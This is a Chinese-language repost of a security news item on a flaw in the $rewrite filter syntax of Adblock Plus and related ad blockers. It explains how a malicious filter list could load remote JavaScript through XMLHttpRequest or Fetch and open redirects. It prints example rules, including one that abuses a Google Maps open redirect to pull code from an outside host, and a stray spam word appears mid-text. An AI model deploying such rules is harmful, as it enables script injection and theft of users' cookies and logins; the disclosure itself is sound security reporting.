Adblock Plus订阅列表机制存在漏洞，可用于运行恶意代码

本文主要是介绍Adblock Plus订阅列表机制存在漏洞，可用于运行恶意代码，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

国外安全专家Sebastian近日发现Adblock Plus、AdBlock和uBlocker浏览器扩展的广告拦截过滤器列表存在漏洞，攻击者可以利用该漏洞运行恶意代码，可窃取用户的cookie、登录凭据、进行页面重定向或其他恶意行为。受影响的扩展拥有超过1亿活跃用户，并且该功能可以轻松利用以攻击任何足够复杂的Web服务（如Google服务），而攻击很难检测并且可以在所有主流浏览器中实现。

Ad-Blocker

“$ rewrite”语法

一个广告屏蔽插件通常分为两个部分：插件本身和订阅列表。订阅列表包含对于各类恶意网址、广告或者插件的屏蔽信息，大多都支持正则表达式。而插件本身则在读取这些订阅列表后进行相应的操作，比如浏览器连接到列表中的网址或者阻止恶意广告和脚本。

举个例子，下方是热门的订阅过滤器EasyList的内容：

easylist

2018年，Adblock Plus 3.2发布时，添加了一个名为$ rewrite 新语法，允许列表维护者将与特定正则表达式匹配的Web请求替换为另一个URL。替换字符串必须是相对应的URL，不包含主机名，并且在重写时必须与原始请求位于同一域中。

举个例子，在订阅列表中添加以下过滤规则可将example.com/ad.gif的所有请求都替换为example.com/puppies.gif。因此，页面上的对应位置不会显示广告，而是更换为小狗照片。

||example.com/ad.gif$rewrite=/puppies.gif

由于重写的URL必须与原始URL位于同一源，并且必须是相对URL，因此以下$ rewrite 实例是无效的。

||example.com/ads.js$rewrite=https://evilsite.tk/bwahaha.js

在新增该语法之处，开发者考虑到了可能引发的安全隐患，所以当重写的对象为SCRIPT、SUBDOCUMENT、OBJECT和OBJECT_SUBREQUEST时，该语法失效。

那么在这些限制的加持下，如何利用该语法运行恶意代码？

XMLHttpRequest和Fetch

当使用XMLHttpRequest或Fetch下载代码并执行时，可以利用此过滤器语法使用Web服务，同时允许请求任意来源并于服务器端开放重定向。这样的攻击难以检测，因为该扩展插件会定期更新过滤器列表，只要该列表的维护人员为恶意过滤器列表设置一个较短的过期时间，然后将其替换为没问题的过滤器列表。

要利用该漏洞需要满足以下条件：

页面必须使用XMLHttpRequest或Fetch加载JS字符串并执行返回的代码；

页面不能严格部署了CSP策略，或者在执行下载的代码之前不能验证最终请求URL；

获取代码的来源必须支持服务器端的重定向或者内容托管。

关键就是使用XMLHttpRequest或Fetch来下载脚本和打开重定向功能，使得攻击者能够从远程站点通过XMLHttpRequest读取脚本，而此时对于插件而言看起来仍是同一个来源。天空彩

比如访问量非常大的Google Maps站点就可以利用XMLHttpRequest加载脚本，因为它的搜索结果页面中包含一个开放重定向：

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

根据上述规则，当用户访问www.google.com/maps/时，过滤规则将使用Google开放重定向来读取https://majestic-ramsons.herokuapp.com/的内容。